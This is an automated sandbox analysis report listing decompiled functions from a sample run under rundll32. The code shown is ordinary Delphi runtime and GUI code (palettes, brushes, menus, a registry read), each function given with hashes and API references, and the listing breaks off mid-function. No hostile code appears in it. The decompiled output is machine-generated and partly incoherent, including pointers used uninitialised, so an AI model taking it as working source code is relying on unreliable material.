Opcode ID: 0fae18d71b699b5f2f79841d7cbaeb52675a56fea66bb61fa8e2c3a28b80c3b5
Instruction ID: 57b6993a39a04dc7884faf0aeb7d12087af2a62067ce7287621ecf65ff095038
Opcode Fuzzy Hash: 0fae18d71b699b5f2f79841d7cbaeb52675a56fea66bb61fa8e2c3a28b80c3b5
Instruction Fuzzy Hash: 3011E2706083419EE711EF76EC5AF9937D8A745B44F40A0F1F208BA6E6D6649CC4CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E31864 Relevance: 9.1, APIs: 6, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E31864(void* __eax, signed int __ecx) {
				char _v1036;
				signed int _v1038;
				struct tagRGBQUAD _v1048;
				short _v1066;
				void* _t20;
				struct HDC__* _t25;
				void* _t28;
				void* _t31;
				struct HPALETTE__* _t33;
				LOGPALETTE* _t34;

				_t31 = __eax;
				_t33 = 0;
				_t34->palVersion = 0x300;
				if(__eax == 0) {
					_v1038 = __ecx;
					E00E128C8(_t28, __ecx << 2,  &_v1036);
				} else {
					_t25 = CreateCompatibleDC(0);
					_t20 = SelectObject(_t25, _t31);
					_v1066 = GetDIBColorTable(_t25, 0, 0x100,  &_v1048);
					SelectObject(_t25, _t20);
					DeleteDC(_t25);
				}
				if(_v1038 != 0) {
					if(_v1038 != 0x10 || E00E317CC(_t34) == 0) {
						E00E3165C( &_v1036, _v1038 & 0x0000ffff);
					}
					_t33 = CreatePalette(_t34);
				}
				return _t33;
			}

0x00e3186d
0x00e3186f
0x00e31871
0x00e31879
0x00e318b3
0x00e318c1
0x00e3187b
0x00e31882
0x00e31886
0x00e3189f
0x00e318a6
0x00e318ac
0x00e318ac
0x00e318cc
0x00e318d4
0x00e318ea
0x00e318ea
0x00e318f7
0x00e318f7
0x00e31904

APIs

CreateCompatibleDC.GDI32(00000000), ref: 00E3187D
SelectObject.GDI32(00000000,00000000), ref: 00E31886
GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,00E353E7,?,?,?,?,00E33EE7), ref: 00E3189A
SelectObject.GDI32(00000000,00000000), ref: 00E318A6
DeleteDC.GDI32(00000000), ref: 00E318AC
CreatePalette.GDI32 ref: 00E318F2

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
String ID:
API String ID: 2515223848-0
Opcode ID: 55b457ebcc57d7affc7d6661a16bb02ac7dc8a86ec7a5e11ee98aeba76cb2da9
Instruction ID: b0d1970e1c6bc7cc2d738a0b0d8beaff6ee0055429ca6c6b204c564e64888f13
Opcode Fuzzy Hash: 55b457ebcc57d7affc7d6661a16bb02ac7dc8a86ec7a5e11ee98aeba76cb2da9
Instruction Fuzzy Hash: F501B17160431026E214B7699C4BBABB6FD9FC0754F05FD5DB588BB282E674C884C3A6

Uniqueness

Uniqueness Score: -1.00%

Function 00E30F48 Relevance: 9.0, APIs: 6, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E30F48(void* __eax) {
				void* _t36;

				_t36 = __eax;
				UnrealizeObject(E00E30724( *((intOrPtr*)(__eax + 0x14))));
				SelectObject( *(_t36 + 4), E00E30724( *((intOrPtr*)(_t36 + 0x14))));
				if(E00E30804( *((intOrPtr*)(_t36 + 0x14))) != 0) {
					SetBkColor( *(_t36 + 4),  !(E00E2FA64(E00E306E8( *((intOrPtr*)(_t36 + 0x14))))));
					return SetBkMode( *(_t36 + 4), 1);
				} else {
					SetBkColor( *(_t36 + 4), E00E2FA64(E00E306E8( *((intOrPtr*)(_t36 + 0x14)))));
					return SetBkMode( *(_t36 + 4), 2);
				}
			}

0x00e30f49
0x00e30f54
0x00e30f66
0x00e30f75
0x00e30faf
0x00e30fc0
0x00e30f77
0x00e30f89
0x00e30f9a
0x00e30f9a

APIs

Part of subcall function 00E30724: CreateBrushIndirect.GDI32(?), ref: 00E307CE

UnrealizeObject.GDI32(00000000), ref: 00E30F54
SelectObject.GDI32(?,00000000), ref: 00E30F66
SetBkColor.GDI32(?,00000000), ref: 00E30F89
SetBkMode.GDI32(?,00000002), ref: 00E30F94
SetBkColor.GDI32(?,00000000), ref: 00E30FAF
SetBkMode.GDI32(?,00000001), ref: 00E30FBA

Part of subcall function 00E2FA64: GetSysColor.USER32(?), ref: 00E2FA6E

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: 0e9ff6545ba0f03158794543908d901db828b735dc98eea382adf2760dd3dbd0
Instruction ID: e538e1c088e8ed3a31dd011e6cb13fb35f98fb3d47759509a2f266f9c839fd34
Opcode Fuzzy Hash: 0e9ff6545ba0f03158794543908d901db828b735dc98eea382adf2760dd3dbd0
Instruction Fuzzy Hash: E6F09CB56012009BDF44FFB8DADBD4A6BECAF48305B046491B908FF55BCA65E850CB31

Uniqueness

Uniqueness Score: -1.00%

Function 00E42C4C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 148
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00E42C4C(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t41;
				void* _t54;
				void* _t61;
				struct HMENU__* _t64;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t87;
				void* _t92;
				intOrPtr _t98;
				void* _t111;
				intOrPtr _t113;
				void* _t116;

				_t109 = __edi;
				_push(__edi);
				_v20 = 0;
				_t113 = __edx;
				_t92 = __eax;
				_push(_t116);
				_push(0xe42e12);
				_push( *[fs:eax]);
				 *[fs:eax] = _t116 + 0xfffffff0;
				if(__edx == 0) {
					L7:
					_t39 =  *((intOrPtr*)(_t92 + 0x248));
					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
						E00E50700(_t39, 0, _t109, 0);
					}
					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
						_t113 = 0;
					}
					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
					if(_t113 != 0) {
						E00E2CD28(_t113, _t92);
					}
					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
						_t41 = E00E5D240(_t92);
						__eflags = _t41;
						if(_t41 != 0) {
							SetMenu(E00E5CFE0(_t92), 0);
						}
						goto L30;
					} else {
						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
								if( *((char*)(_t92 + 0x22f)) != 1) {
									_t54 = E00E5D240(_t92);
									__eflags = _t54;
									if(_t54 != 0) {
										SetMenu(E00E5CFE0(_t92), 0);
									}
								}
								goto L30;
							}
							goto L21;
						} else {
							L21:
							if(E00E5D240(_t92) != 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
								_t110 = _t61;
								_t64 = GetMenu(E00E5CFE0(_t92));
								_t138 = _t61 - _t64;
								if(_t61 != _t64) {
									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
									SetMenu(E00E5CFE0(_t92), _t70);
								}
								E00E50700(_t113, E00E5CFE0(_t92), _t110, _t138);
							}
							L30:
							if( *((char*)(_t92 + 0x22e)) != 0) {
								E00E43D10(_t92, 1);
							}
							E00E42B84(_t92);
							_pop(_t98);
							 *[fs:eax] = _t98;
							_push(0xe42e19);
							return E00E14068( &_v20);
						}
					}
				}
				_t77 =  *0xe7fb20; // 0xf01458
				_t79 = E00E4647C(_t77) - 1;
				if(_t79 >= 0) {
					_v8 = _t79 + 1;
					_t111 = 0;
					do {
						_t81 =  *0xe7fb20; // 0xf01458
						if(_t113 ==  *((intOrPtr*)(E00E46468(_t81, _t111) + 0x248))) {
							_t83 =  *0xe7fb20; // 0xf01458
							if(_t92 != E00E46468(_t83, _t111)) {
								_v16 =  *((intOrPtr*)(_t113 + 8));
								_v12 = 0xb;
								_t87 =  *0xe7dee8; // 0xe2e22c
								E00E15E1C(_t87,  &_v20);
								E00E1B940(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
								E00E13A00();
							}
						}
						_t111 = _t111 + 1;
						_t10 =  &_v8;
						 *_t10 = _v8 - 1;
					} while ( *_t10 != 0);
				}
			}

0x00e42c4c
0x00e42c54
0x00e42c57
0x00e42c5a
0x00e42c5c
0x00e42c60
0x00e42c61
0x00e42c66
0x00e42c69
0x00e42c6e
0x00e42ce0
0x00e42ce0
0x00e42ce8
0x00e42cec
0x00e42cec
0x00e42cf5
0x00e42d01
0x00e42d01
0x00e42d03
0x00e42d0b
0x00e42d11
0x00e42d11
0x00e42d18
0x00e42dcb
0x00e42dd0
0x00e42dd2
0x00e42dde
0x00e42dde
0x00000000
0x00e42d31
0x00e42d3b
0x00e42d4a
0x00e42da4
0x00e42dab
0x00e42daf
0x00e42db4
0x00e42db6
0x00e42dc2
0x00e42dc2
0x00e42db6
0x00000000
0x00e42dab
0x00000000
0x00e42d4c
0x00e42d4c
0x00e42d55
0x00e42d63
0x00e42d66
0x00e42d70
0x00e42d75
0x00e42d77
0x00e42d81
0x00e42d8d
0x00e42d8d
0x00e42d9d
0x00e42d9d
0x00e42de3
0x00e42dea
0x00e42df0
0x00e42df0
0x00e42df7
0x00e42dfe
0x00e42e01
0x00e42e04
0x00e42e11
0x00e42e11
0x00e42d3b
0x00e42d18
0x00e42c70
0x00e42c7a
0x00e42c7d
0x00e42c80
0x00e42c83
0x00e42c85
0x00e42c87
0x00e42c97
0x00e42c9b
0x00e42ca7
0x00e42cac
0x00e42caf
0x00e42cbc
0x00e42cc1
0x00e42cd0
0x00e42cd5
0x00e42cd5
0x00e42ca7
0x00e42cda
0x00e42cdb
0x00e42cdb
0x00e42cdb
0x00e42c85

APIs

GetMenu.USER32(00000000), ref: 00E42D70
SetMenu.USER32(00000000,00000000), ref: 00E42D8D
SetMenu.USER32(00000000,00000000), ref: 00E42DC2
SetMenu.USER32(00000000,00000000,00000000,00E42E12), ref: 00E42DDE

Part of subcall function 00E15E1C: LoadStringA.USER32 ref: 00E15E4D

Strings

,, xrefs: 00E42CBC

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Menu$LoadString
String ID: ,
API String ID: 3688185913-2078262936
Opcode ID: 10e72fb9eee357ca3151bfe3cebc6a433544b1c72dc9053f06ae05c6a6d960de
Instruction ID: 445a11e1b91061b31889d41253a289d4d559cc65df3b86c1099f8dc089da85ed
Opcode Fuzzy Hash: 10e72fb9eee357ca3151bfe3cebc6a433544b1c72dc9053f06ae05c6a6d960de
Instruction Fuzzy Hash: ED519E30A043404BCB61EF29EC85BA9B7E5AF44308F856578FD04FB266CA74DC89C791

Uniqueness

Uniqueness Score: -1.00%

Function 00E35FA0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00E35FA0(intOrPtr* __eax, void* __edx) {
				intOrPtr* _v8;
				struct HPALETTE__* _v12;
				char _v13;
				intOrPtr _v25;
				intOrPtr _v29;
				intOrPtr _v33;
				intOrPtr _v57;
				short _v59;
				short _v61;
				intOrPtr _v65;
				intOrPtr _v69;
				intOrPtr _v73;
				intOrPtr _v77;
				intOrPtr _v89;
				intOrPtr _v93;
				void _v97;
				void* _t44;
				void* _t46;
				intOrPtr _t49;
				void* _t54;
				struct HPALETTE__* _t56;
				void* _t72;
				void* _t74;
				void* _t75;
				struct HDC__* _t76;
				intOrPtr _t97;
				void* _t107;
				void* _t109;
				void* _t110;
				intOrPtr _t112;

				_t107 = _t109;
				_t110 = _t109 + 0xffffffa0;
				_t72 = __edx;
				_v8 = __eax;
				_t44 = E00E350DC(_v8);
				if(_t72 == _t44) {
					L16:
					return _t44;
				} else {
					_t46 = _t72 - 1;
					if(_t46 < 0) {
						_t44 =  *((intOrPtr*)( *_v8 + 0x6c))();
						goto L16;
					} else {
						if(_t46 == 7) {
							_t49 =  *0xe7df28; // 0xe2dfdc
							_t44 = E00E3103C(_t49);
							goto L16;
						} else {
							E00E12C80( &_v97, 0x54);
							_t54 = memcpy( &_v97,  *((intOrPtr*)(_v8 + 0x28)) + 0x18, 6 << 2);
							_t112 = _t110 + 0xc;
							_v13 = 0;
							_v77 = 0;
							_v73 = 0x28;
							_v69 = _v93;
							_v65 = _v89;
							_v61 = 1;
							_v59 =  *0x00E7C6F3 & 0x000000ff;
							_v12 =  *((intOrPtr*)(_t54 + 0x10));
							_t74 = _t72 - 2;
							if(_t74 == 0) {
								_t56 =  *0xe7f894; // 0x6008075c
								_v12 = _t56;
							} else {
								_t75 = _t74 - 1;
								if(_t75 == 0) {
									_t76 = E00E31174(GetDC(0));
									_v12 = CreateHalftonePalette(_t76);
									_v13 = 1;
									ReleaseDC(0, _t76);
								} else {
									if(_t75 == 2) {
										_v57 = 3;
										_v33 = 0xf800;
										_v29 = 0x7e0;
										_v25 = 0x1f;
									}
								}
							}
							 *[fs:eax] = _t112;
							 *((char*)(_v8 + 0x22)) = E00E34BBC( *((intOrPtr*)( *_v8 + 0x64))( *[fs:eax], 0xe360ed, _t107),  &_v97) & 0xffffff00 | _v12 != 0x00000000;
							_pop(_t97);
							 *[fs:eax] = _t97;
							_push(0xe360f4);
							if(_v13 != 0) {
								return DeleteObject(_v12);
							}
							return 0;
						}
					}
				}
			}

0x00e35fa1
0x00e35fa3
0x00e35fa9
0x00e35fab
0x00e35fb1
0x00e35fb8
0x00e360ff
0x00e36105
0x00e35fbe
0x00e35fc0
0x00e35fc2
0x00e35fd1
0x00000000
0x00e35fc4
0x00e35fc6
0x00e35fd9
0x00e35fde
0x00000000
0x00e35fc8
0x00e35ff2
0x00e36008
0x00e36008
0x00e3600a
0x00e36010
0x00e36013
0x00e3601d
0x00e36023
0x00e36026
0x00e36037
0x00e3603e
0x00e36041
0x00e36044
0x00e36051
0x00e36056
0x00e36046
0x00e36046
0x00e36048
0x00e36067
0x00e3606f
0x00e36072
0x00e36079
0x00e3604a
0x00e3604d
0x00e36080
0x00e36087
0x00e3608e
0x00e36095
0x00e36095
0x00e3604d
0x00e36048
0x00e360a7
0x00e360cd
0x00e360d2
0x00e360d5
0x00e360d8
0x00e360e1
0x00000000
0x00e360e7
0x00e360ec
0x00e360ec
0x00e35fc6
0x00e35fc2

APIs

GetDC.USER32(00000000), ref: 00E3605D
CreateHalftonePalette.GDI32(00000000,00000000), ref: 00E3606A
ReleaseDC.USER32 ref: 00E36079
DeleteObject.GDI32(00000000), ref: 00E360E7

Strings

(, xrefs: 00E36013

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: CreateDeleteHalftoneObjectPaletteRelease
String ID: (
API String ID: 577518360-3887548279
Opcode ID: a0fad7c1d1a2b3e272acb29d3ebffaf3440bab3ab555f494192e468abfbb9070
Instruction ID: 86859add2e0c8a8b4036cc17e8ddd2feb2d614f36a4d278d43b46aba3db151d1
Opcode Fuzzy Hash: a0fad7c1d1a2b3e272acb29d3ebffaf3440bab3ab555f494192e468abfbb9070
Instruction Fuzzy Hash: C3417370A04208EFDB18DFA8C44AADEBBF6EF49304F1090A5E504B7351D675AA45DB45

Uniqueness

Uniqueness Score: -1.00%

Function 00E1B6B4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E1B6B4(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0xe7f668; // 0xe10000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E00E1B6A8(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E00E189EC( &_v273, 0x104, E00E1C79C(0x5c) + 1);
				_t74 = 0xe1b834;
				_t86 = 0xe1b834;
				_t83 =  *0xe17204; // 0xe17250
				if(E00E13400(_t87, _t83) != 0) {
					_t74 = E00E14528( *((intOrPtr*)(_t87 + 4)));
					_t69 = E00E18988(_t74, 0xe1b834);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0xe1b838;
					}
				}
				_t51 =  *0xe7e2dc; // 0xe16fb4
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0xe7f668; // 0xe10000
				LoadStringA(E00E15388(_t53),  *_t16,  &_v790, 0x100);
				E00E131C4( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E00E19010(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E00E18988(_v8, _t86);
			}

0x00e1b6b4
0x00e1b6c0
0x00e1b6c3
0x00e1b6c5
0x00e1b6d1
0x00e1b6e0
0x00e1b70a
0x00e1b710
0x00e1b71c
0x00e1b721
0x00e1b727
0x00e1b727
0x00e1b745
0x00e1b74a
0x00e1b74f
0x00e1b756
0x00e1b763
0x00e1b76d
0x00e1b771
0x00e1b778
0x00e1b781
0x00e1b781
0x00e1b778
0x00e1b792
0x00e1b797
0x00e1b79b
0x00e1b7a6
0x00e1b7b3
0x00e1b7be
0x00e1b7c4
0x00e1b7d1
0x00e1b7d7
0x00e1b7e1
0x00e1b7e7
0x00e1b7ee
0x00e1b7f4
0x00e1b7fb
0x00e1b801
0x00e1b81d
0x00e1b830

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 00E1B6D1
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00E1B6F5
GetModuleFileNameA.KERNEL32(00E10000,?,00000105), ref: 00E1B710
LoadStringA.USER32 ref: 00E1B7A6

Strings

Pr, xrefs: 00E1B756

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID: Pr
API String ID: 3990497365-1261746714
Opcode ID: cbd8977cee5997cca1cc4c965d8a3bcca3710723a91c68f721d955b8ab2dc780
Instruction ID: 134ba4586bb51561bc81105f5a24fac9afb5434a4cc26e6a6badc11c06579311
Opcode Fuzzy Hash: cbd8977cee5997cca1cc4c965d8a3bcca3710723a91c68f721d955b8ab2dc780
Instruction Fuzzy Hash: 4E410470A002589BCB21EBA8CC85BDAB7FCAB58700F4451E6A548F7252DB709FC8CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00E130DC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
registryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00E130DC() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0xe7c020 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0xe7c020; // 0x27f
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0xe7c020 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(0xe1314d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0xe13154);
					return RegCloseKey(_v8);
				}
			}

0x00e130dd
0x00e130df
0x00e130e9
0x00e13105
0x00e13154
0x00e13166
0x00e13169
0x00e13172
0x00e13107
0x00e13109
0x00e1310a
0x00e1310f
0x00e13112
0x00e13115
0x00e13131
0x00e13138
0x00e1313b
0x00e1313e
0x00e1314c
0x00e1314c

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00E130FE
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00E1314D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00E13131
RegCloseKey.ADVAPI32(?,00E13154,00000000,?,00000004,00000000,00E1314D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00E13147

Strings

FPUMaskValue, xrefs: 00E13128
SOFTWARE\Borland\Delphi\RTL, xrefs: 00E130F4

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 799c855ee85d2a7a5c87ad4ab8ecfaca93a67885f3b8dff5ea599c3c1e2bb702
Instruction ID: b786b7d615a0ea40c8065f2ea0d08f563349ed8567b717012d87a253f876afdb
Opcode Fuzzy Hash: 799c855ee85d2a7a5c87ad4ab8ecfaca93a67885f3b8dff5ea599c3c1e2bb702
Instruction Fuzzy Hash: 26017179A40308BADB11DBA0CC42BEAB7ECEB09B04F5011A5BA04F6690E6745A94D794

Uniqueness

Uniqueness Score: -1.00%

Function 00E23BFC Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00E23BFC() {
				intOrPtr _t14;
				intOrPtr* _t16;
				intOrPtr* _t17;
				intOrPtr* _t18;
				intOrPtr* _t19;
				intOrPtr* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(0xe23c9d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t23;
				 *0xe7f824 =  *0xe7f824 - 1;
				if( *0xe7f824 < 0) {
					E00E23708();
					 *0xe7f814 = E00E1ECB8;
					 *0xe7f818 = E00E1E85C;
					 *0xe7f81c = E00E1E76C;
					 *0xe7f820 = E00E1E85C;
					_t16 =  *0xe7e0a0; // 0xe7c00c
					 *_t16 = E00E1EFB8;
					_t17 =  *0xe7ddf4; // 0xe7c010
					 *_t17 = 0xe233fc;
					_t18 =  *0xe7e138; // 0xe7c014
					 *_t18 = E00E1F2CC;
					_t19 =  *0xe7e2d0; // 0xe7c018
					 *_t19 = E00E22294;
					_t20 =  *0xe7e160; // 0xe7c01c
					 *_t20 = E00E229BC;
					_push(0xe7f82c);
					L00E164A0();
				}
				_pop(_t14);
				 *[fs:eax] = _t14;
				_push(0xe23ca4);
				return 0;
			}

0x00e23c01
0x00e23c02
0x00e23c07
0x00e23c0a
0x00e23c0d
0x00e23c14
0x00e23c1b
0x00e23c25
0x00e23c2f
0x00e23c39
0x00e23c3f
0x00e23c49
0x00e23c4f
0x00e23c56
0x00e23c5c
0x00e23c63
0x00e23c69
0x00e23c70
0x00e23c76
0x00e23c7d
0x00e23c83
0x00e23c85
0x00e23c8a
0x00e23c8a
0x00e23c91
0x00e23c94
0x00e23c97
0x00e23c9c

APIs

RtlInitializeCriticalSection.KERNEL32(00E7F82C,00000000,00E23C9D), ref: 00E23C8A

Strings

l, xrefs: 00E23C39
\, xrefs: 00E23C3F
,(, xrefs: 00E23C25
\, xrefs: 00E23C2F

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: ,($\$\$l
API String ID: 32694325-458685388
Opcode ID: 1c89b9843425bcaa255a2f9f2a3c41abf53782cd9eb0abde68a0be4427bcdb63
Instruction ID: e134d07d11122e3abb969326cf60ed51c507338b27ed9f2021cc48c702994e7d
Opcode Fuzzy Hash: 1c89b9843425bcaa255a2f9f2a3c41abf53782cd9eb0abde68a0be4427bcdb63
Instruction Fuzzy Hash: AB0116B42043409FA309CF2AF803912BBE5F78E704390A579E808FB760E23499C5CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00E416F4 Relevance: 7.7, APIs: 5, Instructions: 171
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00E416F4(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				signed char _t92;
				int _t98;
				int _t100;
				intOrPtr _t117;
				int _t122;
				intOrPtr _t155;
				void* _t164;
				signed char _t180;
				intOrPtr _t182;
				intOrPtr _t194;
				int _t199;
				intOrPtr _t203;
				void* _t204;

				_t204 = __eflags;
				_t202 = _t203;
				_push(__ecx);
				_v8 = __eax;
				E00E598E4(_v8);
				_push(_t203);
				_push(0xe4194a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t203;
				 *(_v8 + 0x268) = 0;
				 *(_v8 + 0x26c) = 0;
				 *(_v8 + 0x270) = 0;
				_t164 = 0;
				_t92 =  *0xe7f665; // 0x0
				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
				E00E59040(_v8, 0, __ecx, __edx, _t204);
				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
					L12:
					_t98 =  *(_v8 + 0x268);
					_t213 = _t98;
					if(_t98 > 0) {
						E00E56348(_v8, _t98, _t213);
					}
					_t100 =  *(_v8 + 0x26c);
					_t214 = _t100;
					if(_t100 > 0) {
						E00E5638C(_v8, _t100, _t214);
					}
					_t180 =  *0xe41958; // 0x0
					 *(_v8 + 0x98) = _t180;
